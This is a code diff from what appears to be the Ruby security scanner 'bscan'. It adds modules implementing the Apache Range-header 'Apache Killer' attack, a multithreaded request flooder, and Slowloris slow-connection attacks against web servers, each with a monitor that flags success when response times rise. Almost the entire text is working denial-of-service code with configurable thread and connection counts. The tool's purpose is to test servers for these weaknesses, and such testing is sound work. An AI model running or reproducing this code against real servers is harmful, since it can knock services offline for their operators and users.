bscan 1.4.4

data/lib/bscan/modules/kill_apache.rb

@@ -0,0 +1,201 @@
+require "socket"
+require "thread"
+require "openssl"
+require "timeout"
+
+require 'bscan/utils/bscan_helper.rb'
+
+module KillApache
+  def run *args
+    @bscan = args[0]
+    @config ||= @bscan.bscan_config
+    @bscan.activity[0]=true
+
+    @prop_pref = 'bscan.kill_apache.'
+    @prop_pref += args[2] + '.' if args[2] && args[2].length > 0
+    @mid = args[2]?"KillApache.#{args[2]}.":'KillApache.' 
+
+    proto = @config[prop('protocol')] 
+    proto ||= 'http'
+    
+    threads = @config[prop('threads')]
+    threads ||= '500'
+    threads = threads.to_i
+
+    rtf = @config[prop('response_time_factor')]
+    rtf ||= '10'
+    rtf = rtf.to_i
+    rpt = @config[prop('req_per_thread')]
+    rpt ||= '1'
+    rpt = rpt.to_i
+    @rto = @config[prop('read_timeout')]
+    @rto ||= '10'
+    @rto = @rto.to_i
+    ranges = @config[prop('range_nbr')]
+    ranges ||= '500'
+    ranges = ranges.to_i
+    host = @config[prop('hostport')]
+    raise "#{@mid}run parameter #{prop 'hostport'} is missing, exiting" if not host
+    host,port = host.split(':')
+    port = (proto=='http'?80:443) if not port
+    
+    req = "HEAD / HTTP/1.1\r\n"+
+          "Host: #{host}:#{port}\r\n"+
+          "Range:bytes=0-@@@\r\n"+
+          "Accept-Encoding: gzip\r\n"+
+          "Connection: close\r\n\r\n"
+    
+    nreq = req.sub /Range:bytes=@@@\r\n/, ""
+    inj = ''
+    start = 5
+
+    ranges.times do |t|
+      inj += ",#{start}-#{t}"
+    end  
+    req.sub!(/@@@/,inj)
+
+    @bscan.Log 2, "#{@mid}run input: #{threads} #{rpt} #{rtf} #{host} #{port}\n#{req}"
+
+    @threadinfo = {}
+    threads.times do |t|
+      @threadinfo[t] = {}
+      for con in 0..rpt-1
+        @threadinfo[t][con]=nil # need to add keys if they are not there yet
+      end
+    end
+       
+    trg,host,port = get_url_host_port req,proto    
+    
+    @infom ||= Mutex.new
+    
+    rsp,nrt = get_normal_response_time(host, port, nreq, proto, threads)
+
+    @bscan.Log 2, "#{@mid}run normal rt: #{nrt} \n#{rsp}"
+ 
+       # Monitoring thread
+    Thread.new do
+        maxtime=0
+        while (true)
+          begin 
+            sleep 2.5  
+            rsp,rt = get_normal_response_time(host, port, nreq, proto, threads)
+            @bscan.Log 2, "#{@mid}run monitor rt: #{rt}\n#{rsp}"
+            maxtime = rt if rt > nrt*rtf && rt > maxtime     
+            ex = true
+            tnum = 0
+            cnum = 0
+            @threadinfo.each_pair do  |t,c|
+              inc_t = false
+              if c
+                c.each_key do |k|
+                  if c[k] == 1
+                    cnum += 1 
+                    inc_t = true
+                    ex = false
+                  end
+                end
+              end
+              tnum += 1 if inc_t
+            end
+            @bscan.Log 2, "#{@mid}run monitor t/c : #{tnum}/#{cnum}, will sleep 5 sec"
+            break if ex
+          rescue Exception => e
+             @bscan.Log 1, "#{@mid}run Exception: #{e.message}"
+             @bscan.Log 1, e.backtrace.join("\n")
+          end
+        end
+        @bscan.Log 1, "#{@mid}run exiting monitor: #{maxtime}"
+        if maxtime > 0
+          issue = Issue.new "#{@mid.chop}: Apache Killer succeeded", trg, "Medium", "Firm", req, rsp, 
+          "Response time under atack was #{maxtime}, which is #{maxtime/nrt} times bigger than normal response time: #{nrt}"
+            @bscan.write_issue_state issue
+          end  
+      end
+ 
+     threads.times do |t|
+        Thread.new do
+          begin
+            @bscan.Log 2, "#{@mid}run thread: #{t} #{rpt}"
+          for con in 0..rpt-1
+            send_get_rsp host,port,req,proto,t,con
+          end
+        rescue Exception => e
+           @bscan.Log 1, "#{@mid}run Exception: #{e.message}"
+           @bscan.Log 1, e.backtrace.join("\n")
+           Thread.current.exit
+        end
+      end
+   end
+  end
+  
+  def send_get_rsp host,port,req,proto,t,c
+   @bscan.activity[0]=true
+   @threadinfo[t][c] = 1
+   rsp =''
+   s=nil
+   begin
+    timeout(@rto) do
+      s = TCPSocket.new(host, port)
+      if (proto =~ /https/i)
+        ctx = OpenSSL::SSL::SSLContext.new
+        ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE 
+        s = OpenSSL::SSL::SSLSocket.new(s, ctx)
+        s.connect
+      end
+      l = s.syswrite(req)
+      raise "only #{l} bytes out of #{req.length} written #{t} #{req}" if l != req.length
+      rsp = read_response s
+      @bscan.Log 2, "#{@mid}send_get_rsp succeeded for #{t} #{rsp}"
+    end
+   rescue Exception => e
+      @bscan.Log 1, "#{@mid}send_get_rsp failed for #{t} Exception: #{e.message}"
+      @bscan.Log 1, e.backtrace.join("\n")
+      @threadinfo[t][c] = nil
+   end
+
+   begin
+      s.close if s
+    rescue  Exception => e
+      @bscan.Log 1, "#{@mid}send_get_rsp close for #{t} Exception:  #{e.message}"
+   end  
+   @threadinfo[t][c] = 0
+
+   rsp
+  end
+
+
+  def get_normal_response_time host,port,req,proto,t
+    @threadinfo[t] ||= {}
+    rsp = ''
+    start = Time.now
+    @bscan.activity[0]=true
+    begin
+      rsp = send_get_rsp host,port,req,proto,t,0
+    rescue Exception => e
+        @bscan.Log 1, "#{@mid}get_normal_response_time Exception : #{e.message}"
+    end  
+    [rsp,Time.now - start]
+  end
+
+  def read_response s
+      rsp=''
+      begin
+        while (ch=s.sysread(1))
+          rsp += ch
+          if rsp =~ /Content-Length\s*:\s*(\d+)\r?\n$/i
+            len = $1.to_i
+            while (c=s.sysread(1))
+              rsp += c
+              if rsp[-4..-1] == "\r\n\r\n" || rsp[-2..-1] == "\n\n"
+                rsp += s.sysread(len)
+                break
+              end  
+            end
+            break  
+          end
+        end
+      rescue EOFError
+      end
+      rsp
+  end  
+end

data/lib/bscan/modules/many_threads.rb

@@ -0,0 +1,52 @@
+require 'bscan/utils/bscan_helper.rb'
+
+module ManyThreads
+
+  def run *args
+    @bscan = args[0]
+    @config ||= @bscan.bscan_config
+    
+    @bscan.activity[0]=true
+
+    @prop_pref = 'bscan.many_threads.'
+    @prop_pref += args[2] + '.' if args[2] && args[2].length > 0
+    @mid = args[2]?"ManyThreads.#{args[2]}.":'ManyThreads.' 
+    
+    param = @config[prop('request')]
+    a=[]
+    if (not param or (a=param.split(':',3)).size < 2)
+        @bscan.Log 0, "#{@mid}run: 'request' parameter is not valid #{param}, it should be 'request.txt:protocol[:repeater]'"
+        return
+    end
+    threads = @config[prop('threads')]
+    threads ||= '10'
+    @bscan.Log 2, "#{@mid}run input: #{a.join('|')} #{threads}"
+
+    threads = threads.to_i
+
+    begin
+      f,proto,rep = a
+      
+      file = open_in_path(f)
+      req = file.read
+      req.gsub!(/\^M\n/,"\r\n")
+      if (rep)
+        rep = Regexp.escape(rep)
+        req.gsub!(/#{rep}(.+?)#{rep}(\d+)/) {|m| $1*$2.to_i}
+      end
+      
+      set_len req
+      
+      file.close
+      threads.times do
+        Thread.new() {
+        @bscan.activity[0]=true
+         send_req req, proto, '' 
+        }
+      end
+    rescue Exception => e
+        @bscan.Log 0, "#{@mid}run Exception: #{e.message}"
+        @bscan.Log 0, e.backtrace.join("\n")
+    end
+  end
+end

data/lib/bscan/modules/slowloris.rb

@@ -0,0 +1,263 @@
+require "socket"
+require "thread"
+require "openssl"
+
+require 'bscan/utils/bscan_helper.rb'
+
+module Slowloris
+  def run *args
+    @bscan = args[0]
+    @config ||= @bscan.bscan_config
+    @bscan.activity[0]=true
+
+    @prop_pref = 'bscan.slowloris.'
+    @prop_pref += args[2] + '.' if args[2] && args[2].length > 0
+    @mid = args[2]?"Slowloris.#{args[2]}.":'Slowloris.' 
+    begin
+      proto = @config[prop('protocol')]
+      proto ||= 'http'
+      
+      threads = @config[prop('threads')]
+      threads ||= '20'
+      threads = threads.to_i
+
+      rtf = @config[prop('response_time_factor')]
+      rtf ||= '5'
+      rtf = rtf.to_i
+      slt = @config[prop('sleep_time')]
+      slt ||= '100'
+      slt = slt.to_i
+      cn = @config[prop('con_nbr_per_thread')]
+      cn ||= 50
+      cn = cn.to_i
+      ppc = @config[prop('pack_per_con')]
+      ppc ||= 5
+      ppc = ppc.to_i
+      
+      http_method = @config[prop('method')]
+      http_method ||= 'GET'
+
+     req = @config[prop('request')]
+      nreq = nil
+      if req
+        file = open_in_path(req)
+        r = file.read
+        req.gsub!(/\^M\n/,"\r\n")
+        file.close
+        nreq = req
+      else
+        host = @config[prop('hostport')]
+        host,port = host.split(':') if host
+        raise "Either 'host' and 'port' or 'request' params must be set" if !host or !port
+        req = "#{http_method} /@@@ HTTP/1.1\r\n" +
+                "Host: #{host}:#{port}\r\n" +
+                "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1"
+        if http_method == 'POST'
+          req += "\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 7\r\n"
+          nreq = req + "\r\nfoo=moo"
+        else 
+          nreq = req + "\r\n\r\n"
+        end
+      end
+ 
+
+      @bscan.Log 2, "#{@mid}run input: #{threads} #{cn} #{ppc} #{rtf} #{slt} #{host} #{port}\n#{req}"
+#      rsp,nrt = get_normal_response_time nreq,proto
+      @threadinfo = {}
+      trg,host,port = get_url_host_port req,proto
+       
+      @infom ||= Mutex.new
+      
+      rsp,nrt = get_normal_response_time(host, port, nreq, proto, threads)
+      @bscan.Log 2, "#{@mid}run normal rt: #{nrt} \n#{rsp}"
+ 
+       # Monitoring thread
+      Thread.new do
+          maxtime=0
+          while (true)
+            begin 
+              dl = slt/10
+              sleep dl < 10 ? 10 : dl  
+              rsp,rt = get_normal_response_time(host, port, nreq, proto, threads)
+              @bscan.Log 2, "#{@mid}run monitor rt: #{rt}\n#{rsp}"
+              maxtime = rt if rt > nrt*rtf && rt > maxtime     
+              ex = true
+              tnum = 0
+              cnum = 0
+              @threadinfo.each_pair do  |t,c|
+                inc_t = false
+                c.each_key do |k|
+                  if c[k]
+                    cnum += 1 
+                    inc_t = true
+                    ex = false
+                  end
+                end
+                tnum += 1 if inc_t
+              end
+              @bscan.Log 2, "#{@mid}run monitor t/c : #{tnum}/#{cnum}, will sleep #{slt/4} sec"
+              break if ex
+            rescue Exception => e
+               @bscan.Log 1, "#{@mid}run Exception: #{e.message}"
+               @bscan.Log 1, e.backtrace.join("\n")
+            end
+          end
+          @bscan.Log 1, "#{@mid}run exiting monitor: #{maxtime}"
+          if maxtime > 0
+            issue = Issue.new "#{@mid.chop}: Slowloris succeeded", trg, "Medium", "Firm", req, rsp, 
+            "Response time under atack was #{maxtime}, which is #{maxtime/nrt} times bigger than normal response time: #{nrt}"
+            @bscan.write_issue_state issue
+          end  
+      end
+
+ 
+ 
+ 
+ 
+      threads.times do |t|
+
+          @infom.lock
+          @threadinfo[t] = {}
+          @infom.unlock
+          
+          for con in 0..cn-1
+            @infom.lock
+            @threadinfo[t][con]=nil if not @threadinfo[t][con] # need to add keys if they are not there yet
+            @infom.unlock
+          end
+
+          Thread.new do
+            begin
+              @bscan.Log 2, "#{@mid}run thread: #{t} #{cn}"
+              make_conns cn,host,port,req,proto,t
+              for pcnt in 0..ppc-1 
+                    @bscan.Log 2, "#{@mid}run after sleep: #{t} #{cn}"
+                    for con in 0..cn-1
+                      send_more host,port,proto,t,con
+                    end
+                    sleep slt
+              end
+            raise Exception => e
+               @bscan.Log 1, "#{@mid}run Exception: #{e.message}"
+               @bscan.Log 1, e.backtrace.join("\n")
+               Thread.current.exit
+            end
+          end
+      end
+      close_all
+      
+    
+    rescue Exception => e
+      @bscan.Log 0, "#{@mid}run Exception: #{e.message}"
+      @bscan.Log 0, e.backtrace.join("\n")
+    end
+  end
+  def update_info t,con,val
+    @infom.lock
+    @threadinfo[t][con] = val if @threadinfo[t]
+    @infom.unlock
+  end  
+  def close_all
+    @threadinfo.each_pair do |k,v|
+      v.each_key do |i|
+        begin
+          v[i].close if v[i]
+          update_info k,i,nil
+        rescue
+        end  
+      end  
+    end
+  end
+
+  def make_conns nbr,host,port,req,proto,t
+    @bscan.Log 2, "#{@mid}make_conns: #{t}  #{nbr}"
+    nbr.times do |con| 
+      @bscan.Log 2, "#{@mid}make_conns connection: #{t}  #{con}"
+      send_slow host,port,req,proto,t,con
+    end 
+  end
+
+  def send_more host,port,proto,t,con
+    send_slow host,port,"Connection: Keep-Alive\r\n",proto,t,con,false
+  end
+
+  def send_slow host,port,req,proto,t,con,reopen=true
+   @bscan.activity[0]=true
+   begin
+      s = @threadinfo[t][con]
+      rndr = random_url(req)
+
+      if !s || s.closed? || s.syswrite(rndr) != rndr.length
+        s.close if s && !s.closed?
+        raise "can't send more, connection closed  #{host} #{port} #{t} #{con}" if not reopen
+          
+        @bscan.Log 2, "#{@mid}send_slow new socket #{host} #{port} #{t} #{con}"
+        s = TCPSocket.new(host, port)
+        if (proto =~ /https/i)
+          ctx = OpenSSL::SSL::SSLContext.new
+          ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE 
+          s = OpenSSL::SSL::SSLSocket.new(s, ctx)
+          s.connect
+        end
+        update_info t,con,s
+      end
+      s.syswrite(rndr)
+      @bscan.Log 2, "#{@mid}send_slow succeeded for  #{t} #{con} #{rndr}"
+      @bscan.Log 2, "#{@mid}send_slow send_more #{t} #{con}" if !reopen
+    rescue Exception => e
+      @bscan.Log 1, "#{@mid}send_slow failed for #{t} #{con}: #{e.message}"
+      begin
+        s.close
+      rescue
+      end  
+      update_info t,con,nil
+    end
+  end
+  
+  def random_url req
+    req.sub /^(POST|GET)\s+\/@@@/, "\\1 /#{'u'+rand(1000000).to_s}"
+  end
+
+  def get_normal_response_time host,port,req,proto,t
+    @threadinfo[t] ||= {}
+    rsp = ''
+    start = Time.now
+    @bscan.activity[0]=true
+    req = random_url req
+    begin
+      send_slow host,port,req,proto,t,0
+      s = @threadinfo[t][0]
+      if !s 
+        raise "read failed for: #{req}"
+      end
+      rsp = read_response s
+    rescue Exception => e
+        @bscan.Log 1, "#{@mid}get_normal_response_time Exception : #{e.message}"
+    end  
+    begin
+      s.close
+    rescue
+    end  
+    update_info t,0,nil
+    [rsp,Time.now - start]
+  end
+
+  def read_response s
+      rsp=''
+      while (ch=s.sysread(1))
+        rsp += ch
+        if rsp =~ /Content-Length\s*:\s*(\d+)\r?\n$/i
+          len = $1.to_i
+          while (c=s.sysread(1))
+            rsp += c
+            if rsp[-4..-1] == "\r\n\r\n" || rsp[-2..-1] == "\n\n"
+              rsp += s.sysread(len)
+              break
+            end  
+          end
+          break  
+        end
+      end
+      rsp
+  end  
+end